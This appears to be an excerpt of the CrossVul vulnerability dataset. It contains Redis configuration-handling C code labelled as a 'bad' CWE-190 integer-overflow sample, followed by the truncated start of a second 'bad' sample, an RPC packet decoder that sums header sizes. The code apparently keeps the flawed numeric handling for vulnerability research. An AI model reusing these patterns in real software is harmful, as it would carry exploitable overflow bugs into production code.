rewriteConfigBytesOption(state, name, value, data.numeric.default_value);
} else {
rewriteConfigNumericalOption(state, name, value, data.numeric.default_value);
}
}
#define INTEGER_CONFIG 0
#define MEMORY_CONFIG 1
#define embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(numericConfigInit, numericConfigSet, numericConfigGet, numericConfigRewrite) \
.data.numeric = { \
.lower_bound = (lower), \
.upper_bound = (upper), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.is_memory = (memory),
#define createIntConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_INT, \
.config.i = &(config_addr) \
} \
}
#define createUIntConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_UINT, \
.config.ui = &(config_addr) \
} \
}
#define createLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_LONG, \
.config.l = &(config_addr) \
} \
}
#define createULongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_ULONG, \
.config.ul = &(config_addr) \
} \
}
#define createLongLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_LONG_LONG, \
.config.ll = &(config_addr) \
} \
}
#define createULongLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_ULONG_LONG, \
.config.ull = &(config_addr) \
} \
}
#define createSizeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_SIZE_T, \
.config.st = &(config_addr) \
} \
}
#define createSSizeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_SSIZE_T, \
.config.sst = &(config_addr) \
} \
}
#define createTimeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_TIME_T, \
.config.tt = &(config_addr) \
} \
}
#define createOffTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_OFF_T, \
.config.ot = &(config_addr) \
} \
}
static int isValidActiveDefrag(int val, char **err) {
#ifndef HAVE_DEFRAG
if (val) {
*err = "Active defragmentation cannot be enabled: it "
"requires a Redis server compiled with a modified Jemalloc "
"like the one shipped by default with the Redis source "
"distribution";
return 0;
}
#else
UNUSED(val);
UNUSED(err);
#endif
return 1;
}
static int isValidDBfilename(char *val, char **err) {
if (!pathIsBaseName(val)) {
*err = "dbfilename can't be a path, just a filename";
return 0;
}
return 1;
}
static int isValidAOFfilename(char *val, char **err) {
if (!pathIsBaseName(val)) {
*err = "appendfilename can't be a path, just a filename";
return 0;
}
return 1;
}
static int updateHZ(long long val, long long prev, char **err) {
UNUSED(prev);
UNUSED(err);
/* Hz is more a hint from the user, so we accept values out of range
* but cap them to reasonable values. */
server.config_hz = val;
if (server.config_hz < CONFIG_MIN_HZ) server.config_hz = CONFIG_MIN_HZ;
if (server.config_hz > CONFIG_MAX_HZ) server.config_hz = CONFIG_MAX_HZ;
server.hz = server.config_hz;
return 1;
}
static int updateJemallocBgThread(int val, int prev, char **err) {
UNUSED(prev);
UNUSED(err);
set_jemalloc_bg_thread(val);
return 1;
}
static int updateReplBacklogSize(long long val, long long prev, char **err) {
/* resizeReplicationBacklog sets server.repl_backlog_size, and relies on
* being able to tell when the size changes, so restore prev before calling it. */
UNUSED(err);
server.repl_backlog_size = prev;
resizeReplicationBacklog(val);
return 1;
}
static int updateMaxmemory(long long val, long long prev, char **err) {
UNUSED(prev);
UNUSED(err);
if (val) {
size_t used = zmalloc_used_memory()-freeMemoryGetNotCountedMemory();
if ((unsigned long long)val < used) {
serverLog(LL_WARNING,"WARNING: the new maxmemory value set via CONFIG SET (%llu) is smaller than the current memory usage (%zu). This will result in key eviction and/or the inability to accept new write commands depending on the maxmemory-policy.", server.maxmemory, used);
}
freeMemoryIfNeededAndSafe();
}
return 1;
}
static int updateGoodSlaves(long long val, long long prev, char **err) {
UNUSED(val);
UNUSED(prev);
UNUSED(err);
refreshGoodSlavesCount();
return 1;
}
static int updateAppendonly(int val, int prev, char **err) {
UNUSED(prev);
if (val == 0 && server.aof_state != AOF_OFF) {
stopAppendOnly();
} else if (val && server.aof_state == AOF_OFF) {
if (startAppendOnly() == C_ERR) {
*err = "Unable to turn on AOF. Check server logs.";
return 0;
}
}
return 1;
}
static int updateMaxclients(long long val, long long prev, char **err) {
/* Try to check if the OS is capable of supporting so many FDs. */
if (val > prev) {
adjustOpenFilesLimit();
if (server.maxclients != val) {
static char msg[128];
            snprintf(msg, sizeof(msg), "The operating system is not able to handle the specified number of clients, try with %u", server.maxclients);
*err = msg;
if (server.maxclients > prev) {
server.maxclients = prev;
adjustOpenFilesLimit();
}
return 0;
}
if ((unsigned int) aeGetSetSize(server.el) <
server.maxclients + CONFIG_FDSET_INCR)
{
if (aeResizeSetSize(server.el,
server.maxclients + CONFIG_FDSET_INCR) == AE_ERR)
{
*err = "The event loop API used by Redis is not able to handle the specified number of clients";
return 0;
}
}
}
return 1;
}
static int updateOOMScoreAdj(int val, int prev, char **err) {
UNUSED(prev);
if (val) {
if (setOOMScoreAdj(-1) == C_ERR) {
*err = "Failed to set current oom_score_adj. Check server logs.";
return 0;
}
}
return 1;
}
#ifdef USE_OPENSSL
static int updateTlsCfg(char *val, char *prev, char **err) {
UNUSED(val);
UNUSED(prev);
UNUSED(err);
/* If TLS is enabled, try to configure OpenSSL. */
if ((server.tls_port || server.tls_replication || server.tls_cluster)
&& tlsConfigure(&server.tls_ctx_config) == C_ERR) {
*err = "Unable to update TLS configuration. Check server logs.";
return 0;
}
return 1;
}
static int updateTlsCfgBool(int val, int prev, char **err) {
UNUSED(val);
UNUSED(prev);
return updateTlsCfg(NULL, NULL, err);
}
static int updateTlsCfgInt(long long val, long long prev, char **err) {
UNUSED(val);
UNUSED(prev);
return updateTlsCfg(NULL, NULL, err);
}
#endif /* USE_OPENSSL */
standardConfig configs[] = {
/* Bool configs */
createBoolConfig("rdbchecksum", NULL, IMMUTABLE_CONFIG, server.rdb_checksum, 1, NULL, NULL),
createBoolConfig("daemonize", NULL, IMMUTABLE_CONFIG, server.daemonize, 0, NULL, NULL),
createBoolConfig("io-threads-do-reads", NULL, IMMUTABLE_CONFIG, server.io_threads_do_reads, 0,NULL, NULL), /* Read + parse from threads? */
createBoolConfig("lua-replicate-commands", NULL, MODIFIABLE_CONFIG, server.lua_always_replicate_commands, 1, NULL, NULL),
createBoolConfig("always-show-logo", NULL, IMMUTABLE_CONFIG, server.always_show_logo, 0, NULL, NULL),
createBoolConfig("protected-mode", NULL, MODIFIABLE_CONFIG, server.protected_mode, 1, NULL, NULL),
createBoolConfig("rdbcompression", NULL, MODIFIABLE_CONFIG, server.rdb_compression, 1, NULL, NULL),
createBoolConfig("rdb-del-sync-files", NULL, MODIFIABLE_CONFIG, server.rdb_del_sync_files, 0, NULL, NULL),
createBoolConfig("activerehashing", NULL, MODIFIABLE_CONFIG, server.activerehashing, 1, NULL, NULL),
createBoolConfig("stop-writes-on-bgsave-error", NULL, MODIFIABLE_CONFIG, server.stop_writes_on_bgsave_err, 1, NULL, NULL),
createBoolConfig("dynamic-hz", NULL, MODIFIABLE_CONFIG, server.dynamic_hz, 1, NULL, NULL), /* Adapt hz to # of clients.*/
createBoolConfig("lazyfree-lazy-eviction", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_eviction, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-expire", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_expire, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-server-del", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_server_del, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-user-del", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_user_del , 0, NULL, NULL),
createBoolConfig("repl-disable-tcp-nodelay", NULL, MODIFIABLE_CONFIG, server.repl_disable_tcp_nodelay, 0, NULL, NULL),
createBoolConfig("repl-diskless-sync", NULL, MODIFIABLE_CONFIG, server.repl_diskless_sync, 0, NULL, NULL),
createBoolConfig("gopher-enabled", NULL, MODIFIABLE_CONFIG, server.gopher_enabled, 0, NULL, NULL),
createBoolConfig("aof-rewrite-incremental-fsync", NULL, MODIFIABLE_CONFIG, server.aof_rewrite_incremental_fsync, 1, NULL, NULL),
createBoolConfig("no-appendfsync-on-rewrite", NULL, MODIFIABLE_CONFIG, server.aof_no_fsync_on_rewrite, 0, NULL, NULL),
createBoolConfig("cluster-require-full-coverage", NULL, MODIFIABLE_CONFIG, server.cluster_require_full_coverage, 1, NULL, NULL),
createBoolConfig("rdb-save-incremental-fsync", NULL, MODIFIABLE_CONFIG, server.rdb_save_incremental_fsync, 1, NULL, NULL),
createBoolConfig("aof-load-truncated", NULL, MODIFIABLE_CONFIG, server.aof_load_truncated, 1, NULL, NULL),
createBoolConfig("aof-use-rdb-preamble", NULL, MODIFIABLE_CONFIG, server.aof_use_rdb_preamble, 1, NULL, NULL),
createBoolConfig("cluster-replica-no-failover", "cluster-slave-no-failover", MODIFIABLE_CONFIG, server.cluster_slave_no_failover, 0, NULL, NULL), /* Failover by default. */
createBoolConfig("replica-lazy-flush", "slave-lazy-flush", MODIFIABLE_CONFIG, server.repl_slave_lazy_flush, 0, NULL, NULL),
createBoolConfig("replica-serve-stale-data", "slave-serve-stale-data", MODIFIABLE_CONFIG, server.repl_serve_stale_data, 1, NULL, NULL),
createBoolConfig("replica-read-only", "slave-read-only", MODIFIABLE_CONFIG, server.repl_slave_ro, 1, NULL, NULL),
createBoolConfig("replica-ignore-maxmemory", "slave-ignore-maxmemory", MODIFIABLE_CONFIG, server.repl_slave_ignore_maxmemory, 1, NULL, NULL),
createBoolConfig("jemalloc-bg-thread", NULL, MODIFIABLE_CONFIG, server.jemalloc_bg_thread, 1, NULL, updateJemallocBgThread),
createBoolConfig("activedefrag", NULL, MODIFIABLE_CONFIG, server.active_defrag_enabled, 0, isValidActiveDefrag, NULL),
createBoolConfig("syslog-enabled", NULL, IMMUTABLE_CONFIG, server.syslog_enabled, 0, NULL, NULL),
createBoolConfig("cluster-enabled", NULL, IMMUTABLE_CONFIG, server.cluster_enabled, 0, NULL, NULL),
createBoolConfig("appendonly", NULL, MODIFIABLE_CONFIG, server.aof_enabled, 0, NULL, updateAppendonly),
createBoolConfig("cluster-allow-reads-when-down", NULL, MODIFIABLE_CONFIG, server.cluster_allow_reads_when_down, 0, NULL, NULL),
/* String Configs */
createStringConfig("aclfile", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.acl_filename, "", NULL, NULL),
createStringConfig("unixsocket", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.unixsocket, NULL, NULL, NULL),
createStringConfig("pidfile", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.pidfile, NULL, NULL, NULL),
createStringConfig("replica-announce-ip", "slave-announce-ip", MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.slave_announce_ip, NULL, NULL, NULL),
createStringConfig("masteruser", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.masteruser, NULL, NULL, NULL),
createStringConfig("masterauth", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.masterauth, NULL, NULL, NULL),
createStringConfig("cluster-announce-ip", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.cluster_announce_ip, NULL, NULL, NULL),
createStringConfig("syslog-ident", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.syslog_ident, "redis", NULL, NULL),
createStringConfig("dbfilename", NULL, MODIFIABLE_CONFIG, ALLOW_EMPTY_STRING, server.rdb_filename, "dump.rdb", isValidDBfilename, NULL),
createStringConfig("appendfilename", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.aof_filename, "appendonly.aof", isValidAOFfilename, NULL),
createStringConfig("server_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.server_cpulist, NULL, NULL, NULL),
createStringConfig("bio_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.bio_cpulist, NULL, NULL, NULL),
createStringConfig("aof_rewrite_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.aof_rewrite_cpulist, NULL, NULL, NULL),
createStringConfig("bgsave_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.bgsave_cpulist, NULL, NULL, NULL),
createStringConfig("ignore-warnings", NULL, MODIFIABLE_CONFIG, ALLOW_EMPTY_STRING, server.ignore_warnings, "ARM64-COW-BUG", NULL, NULL),
/* Enum Configs */
createEnumConfig("supervised", NULL, IMMUTABLE_CONFIG, supervised_mode_enum, server.supervised_mode, SUPERVISED_NONE, NULL, NULL),
createEnumConfig("syslog-facility", NULL, IMMUTABLE_CONFIG, syslog_facility_enum, server.syslog_facility, LOG_LOCAL0, NULL, NULL),
createEnumConfig("repl-diskless-load", NULL, MODIFIABLE_CONFIG, repl_diskless_load_enum, server.repl_diskless_load, REPL_DISKLESS_LOAD_DISABLED, NULL, NULL),
createEnumConfig("loglevel", NULL, MODIFIABLE_CONFIG, loglevel_enum, server.verbosity, LL_NOTICE, NULL, NULL),
createEnumConfig("maxmemory-policy", NULL, MODIFIABLE_CONFIG, maxmemory_policy_enum, server.maxmemory_policy, MAXMEMORY_NO_EVICTION, NULL, NULL),
createEnumConfig("appendfsync", NULL, MODIFIABLE_CONFIG, aof_fsync_enum, server.aof_fsync, AOF_FSYNC_EVERYSEC, NULL, NULL),
createEnumConfig("oom-score-adj", NULL, MODIFIABLE_CONFIG, oom_score_adj_enum, server.oom_score_adj, OOM_SCORE_ADJ_NO, NULL, updateOOMScoreAdj),
/* Integer configs */
createIntConfig("databases", NULL, IMMUTABLE_CONFIG, 1, INT_MAX, server.dbnum, 16, INTEGER_CONFIG, NULL, NULL),
createIntConfig("port", NULL, IMMUTABLE_CONFIG, 0, 65535, server.port, 6379, INTEGER_CONFIG, NULL, NULL), /* TCP port. */
createIntConfig("io-threads", NULL, IMMUTABLE_CONFIG, 1, 128, server.io_threads_num, 1, INTEGER_CONFIG, NULL, NULL), /* Single threaded by default */
createIntConfig("auto-aof-rewrite-percentage", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.aof_rewrite_perc, 100, INTEGER_CONFIG, NULL, NULL),
createIntConfig("cluster-replica-validity-factor", "cluster-slave-validity-factor", MODIFIABLE_CONFIG, 0, INT_MAX, server.cluster_slave_validity_factor, 10, INTEGER_CONFIG, NULL, NULL), /* Slave max data age factor. */
createIntConfig("list-max-ziplist-size", NULL, MODIFIABLE_CONFIG, INT_MIN, INT_MAX, server.list_max_ziplist_size, -2, INTEGER_CONFIG, NULL, NULL),
createIntConfig("tcp-keepalive", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tcpkeepalive, 300, INTEGER_CONFIG, NULL, NULL),
createIntConfig("cluster-migration-barrier", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.cluster_migration_barrier, 1, INTEGER_CONFIG, NULL, NULL),
createIntConfig("active-defrag-cycle-min", NULL, MODIFIABLE_CONFIG, 1, 99, server.active_defrag_cycle_min, 1, INTEGER_CONFIG, NULL, NULL), /* Default: 1% CPU min (at lower threshold) */
createIntConfig("active-defrag-cycle-max", NULL, MODIFIABLE_CONFIG, 1, 99, server.active_defrag_cycle_max, 25, INTEGER_CONFIG, NULL, NULL), /* Default: 25% CPU max (at upper threshold) */
createIntConfig("active-defrag-threshold-lower", NULL, MODIFIABLE_CONFIG, 0, 1000, server.active_defrag_threshold_lower, 10, INTEGER_CONFIG, NULL, NULL), /* Default: don't defrag when fragmentation is below 10% */
createIntConfig("active-defrag-threshold-upper", NULL, MODIFIABLE_CONFIG, 0, 1000, server.active_defrag_threshold_upper, 100, INTEGER_CONFIG, NULL, NULL), /* Default: maximum defrag force at 100% fragmentation */
createIntConfig("lfu-log-factor", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.lfu_log_factor, 10, INTEGER_CONFIG, NULL, NULL),
createIntConfig("lfu-decay-time", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.lfu_decay_time, 1, INTEGER_CONFIG, NULL, NULL),
createIntConfig("replica-priority", "slave-priority", MODIFIABLE_CONFIG, 0, INT_MAX, server.slave_priority, 100, INTEGER_CONFIG, NULL, NULL),
createIntConfig("repl-diskless-sync-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_diskless_sync_delay, 5, INTEGER_CONFIG, NULL, NULL),
createIntConfig("maxmemory-samples", NULL, MODIFIABLE_CONFIG, 1, INT_MAX, server.maxmemory_samples, 5, INTEGER_CONFIG, NULL, NULL),
createIntConfig("timeout", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.maxidletime, 0, INTEGER_CONFIG, NULL, NULL), /* Default client timeout: infinite */
createIntConfig("replica-announce-port", "slave-announce-port", MODIFIABLE_CONFIG, 0, 65535, server.slave_announce_port, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("tcp-backlog", NULL, IMMUTABLE_CONFIG, 0, INT_MAX, server.tcp_backlog, 511, INTEGER_CONFIG, NULL, NULL), /* TCP listen backlog. */
createIntConfig("cluster-announce-bus-port", NULL, MODIFIABLE_CONFIG, 0, 65535, server.cluster_announce_bus_port, 0, INTEGER_CONFIG, NULL, NULL), /* Default: Use +10000 offset. */
createIntConfig("cluster-announce-port", NULL, MODIFIABLE_CONFIG, 0, 65535, server.cluster_announce_port, 0, INTEGER_CONFIG, NULL, NULL), /* Use server.port */
createIntConfig("repl-timeout", NULL, MODIFIABLE_CONFIG, 1, INT_MAX, server.repl_timeout, 60, INTEGER_CONFIG, NULL, NULL),
createIntConfig("repl-ping-replica-period", "repl-ping-slave-period", MODIFIABLE_CONFIG, 1, INT_MAX, server.repl_ping_slave_period, 10, INTEGER_CONFIG, NULL, NULL),
createIntConfig("list-compress-depth", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.list_compress_depth, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("rdb-key-save-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.rdb_key_save_delay, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("key-load-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.key_load_delay, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("active-expire-effort", NULL, MODIFIABLE_CONFIG, 1, 10, server.active_expire_effort, 1, INTEGER_CONFIG, NULL, NULL), /* From 1 to 10. */
createIntConfig("hz", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.config_hz, CONFIG_DEFAULT_HZ, INTEGER_CONFIG, NULL, updateHZ),
createIntConfig("min-replicas-to-write", "min-slaves-to-write", MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_min_slaves_to_write, 0, INTEGER_CONFIG, NULL, updateGoodSlaves),
createIntConfig("min-replicas-max-lag", "min-slaves-max-lag", MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_min_slaves_max_lag, 10, INTEGER_CONFIG, NULL, updateGoodSlaves),
/* Unsigned int configs */
createUIntConfig("maxclients", NULL, MODIFIABLE_CONFIG, 1, UINT_MAX, server.maxclients, 10000, INTEGER_CONFIG, NULL, updateMaxclients),
/* Unsigned Long configs */
createULongConfig("active-defrag-max-scan-fields", NULL, MODIFIABLE_CONFIG, 1, LONG_MAX, server.active_defrag_max_scan_fields, 1000, INTEGER_CONFIG, NULL, NULL), /* Default: keys with more than 1000 fields will be processed separately */
createULongConfig("slowlog-max-len", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.slowlog_max_len, 128, INTEGER_CONFIG, NULL, NULL),
createULongConfig("acllog-max-len", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.acllog_max_len, 128, INTEGER_CONFIG, NULL, NULL),
/* Long Long configs */
createLongLongConfig("lua-time-limit", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.lua_time_limit, 5000, INTEGER_CONFIG, NULL, NULL),/* milliseconds */
createLongLongConfig("cluster-node-timeout", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.cluster_node_timeout, 15000, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("slowlog-log-slower-than", NULL, MODIFIABLE_CONFIG, -1, LLONG_MAX, server.slowlog_log_slower_than, 10000, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("latency-monitor-threshold", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.latency_monitor_threshold, 0, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("proto-max-bulk-len", NULL, MODIFIABLE_CONFIG, 1024*1024, LLONG_MAX, server.proto_max_bulk_len, 512ll*1024*1024, MEMORY_CONFIG, NULL, NULL), /* Bulk request max size */
createLongLongConfig("stream-node-max-entries", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.stream_node_max_entries, 100, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("repl-backlog-size", NULL, MODIFIABLE_CONFIG, 1, LLONG_MAX, server.repl_backlog_size, 1024*1024, MEMORY_CONFIG, NULL, updateReplBacklogSize), /* Default: 1mb */
/* Unsigned Long Long configs */
createULongLongConfig("maxmemory", NULL, MODIFIABLE_CONFIG, 0, ULLONG_MAX, server.maxmemory, 0, MEMORY_CONFIG, NULL, updateMaxmemory),
/* Size_t configs */
createSizeTConfig("hash-max-ziplist-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hash_max_ziplist_entries, 512, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("set-max-intset-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.set_max_intset_entries, 512, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("zset-max-ziplist-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.zset_max_ziplist_entries, 128, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("active-defrag-ignore-bytes", NULL, MODIFIABLE_CONFIG, 1, LLONG_MAX, server.active_defrag_ignore_bytes, 100<<20, MEMORY_CONFIG, NULL, NULL), /* Default: don't defrag if frag overhead is below 100mb */
createSizeTConfig("hash-max-ziplist-value", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hash_max_ziplist_value, 64, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("stream-node-max-bytes", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.stream_node_max_bytes, 4096, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("zset-max-ziplist-value", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.zset_max_ziplist_value, 64, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("hll-sparse-max-bytes", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hll_sparse_max_bytes, 3000, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("tracking-table-max-keys", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.tracking_table_max_keys, 1000000, INTEGER_CONFIG, NULL, NULL), /* Default: 1 million keys max. */
/* Other configs */
createTimeTConfig("repl-backlog-ttl", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.repl_backlog_time_limit, 60*60, INTEGER_CONFIG, NULL, NULL), /* Default: 1 hour */
createOffTConfig("auto-aof-rewrite-min-size", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.aof_rewrite_min_size, 64*1024*1024, MEMORY_CONFIG, NULL, NULL),
#ifdef USE_OPENSSL
createIntConfig("tls-port", NULL, IMMUTABLE_CONFIG, 0, 65535, server.tls_port, 0, INTEGER_CONFIG, NULL, updateTlsCfgInt), /* TCP port. */
createIntConfig("tls-session-cache-size", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tls_ctx_config.session_cache_size, 20*1024, INTEGER_CONFIG, NULL, updateTlsCfgInt),
createIntConfig("tls-session-cache-timeout", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tls_ctx_config.session_cache_timeout, 300, INTEGER_CONFIG, NULL, updateTlsCfgInt),
createBoolConfig("tls-cluster", NULL, MODIFIABLE_CONFIG, server.tls_cluster, 0, NULL, updateTlsCfgBool),
createBoolConfig("tls-replication", NULL, MODIFIABLE_CONFIG, server.tls_replication, 0, NULL, updateTlsCfgBool),
createEnumConfig("tls-auth-clients", NULL, MODIFIABLE_CONFIG, tls_auth_clients_enum, server.tls_auth_clients, TLS_CLIENT_AUTH_YES, NULL, NULL),
createBoolConfig("tls-prefer-server-ciphers", NULL, MODIFIABLE_CONFIG, server.tls_ctx_config.prefer_server_ciphers, 0, NULL, updateTlsCfgBool),
createBoolConfig("tls-session-caching", NULL, MODIFIABLE_CONFIG, server.tls_ctx_config.session_caching, 1, NULL, updateTlsCfgBool),
createStringConfig("tls-cert-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.cert_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-key-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.key_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-dh-params-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.dh_params_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ca-cert-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ca_cert_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ca-cert-dir", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ca_cert_dir, NULL, NULL, updateTlsCfg),
createStringConfig("tls-protocols", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.protocols, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ciphers", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ciphers, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ciphersuites", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ciphersuites, NULL, NULL, updateTlsCfg),
#endif
/* NULL Terminator */
{NULL}
};
/*-----------------------------------------------------------------------------
* CONFIG command entry point
*----------------------------------------------------------------------------*/
void configCommand(client *c) {
/* Only allow CONFIG GET while loading. */
if (server.loading && strcasecmp(c->argv[1]->ptr,"get")) {
addReplyError(c,"Only CONFIG GET is allowed during loading");
return;
}
if (c->argc == 2 && !strcasecmp(c->argv[1]->ptr,"help")) {
const char *help[] = {
"GET <pattern> -- Return parameters matching the glob-like <pattern> and their values.",
"SET <parameter> <value> -- Set parameter to value.",
"RESETSTAT -- Reset statistics reported by INFO.",
"REWRITE -- Rewrite the configuration file.",
NULL
};
addReplyHelp(c, help);
} else if (!strcasecmp(c->argv[1]->ptr,"set") && c->argc == 4) {
configSetCommand(c);
} else if (!strcasecmp(c->argv[1]->ptr,"get") && c->argc == 3) {
configGetCommand(c);
} else if (!strcasecmp(c->argv[1]->ptr,"resetstat") && c->argc == 2) {
resetServerStats();
resetCommandTableStats();
addReply(c,shared.ok);
} else if (!strcasecmp(c->argv[1]->ptr,"rewrite") && c->argc == 2) {
if (server.configfile == NULL) {
addReplyError(c,"The server is running without a config file");
return;
}
if (rewriteConfig(server.configfile, 0) == -1) {
serverLog(LL_WARNING,"CONFIG REWRITE failed: %s", strerror(errno));
addReplyErrorFormat(c,"Rewriting config file: %s", strerror(errno));
} else {
serverLog(LL_WARNING,"CONFIG REWRITE executed with success.");
addReply(c,shared.ok);
}
} else {
addReplySubcommandSyntaxError(c);
return;
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_1943_0 |
crossvul-cpp_data_bad_400_1 | /*
* Description:
* History: yang@haipo.me, 2016/03/30, create
*/
# include <stdlib.h>
# include <assert.h>
# include "ut_rpc.h"
# include "ut_crc32.h"
# include "ut_misc.h"
int rpc_decode(nw_ses *ses, void *data, size_t max)
{
if (max < RPC_PKG_HEAD_SIZE)
return 0;
rpc_pkg *pkg = data;
if (le32toh(pkg->magic) != RPC_PKG_MAGIC)
return -1;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + le16toh(pkg->ext_size) + le32toh(pkg->body_size);
